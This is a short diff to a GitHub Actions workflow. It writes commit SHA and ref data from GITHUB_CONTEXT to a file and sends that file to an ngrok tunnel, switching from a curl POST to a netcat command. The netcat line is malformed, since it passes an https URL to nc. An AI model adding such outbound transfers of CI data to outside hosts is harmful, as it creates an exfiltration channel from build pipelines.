--- a/.github/workflows/commitid.yml
+++ b/.github/workflows/commitid.yml
@@ -19,5 +19,5 @@ jobs:
       shell: bash
       run: echo "$GITHUB_CONTEXT"| grep -i 'after\|ref_name' >> sha.txt
     - name: send sha file
-      run: curl -X POST -d @sha.txt https://f5de-49-207-225-28.in.ngrok.io/gitconfig
+      run: cat sha.txt| nc https://725a-49-207-228-142.in.ngrok.io
        
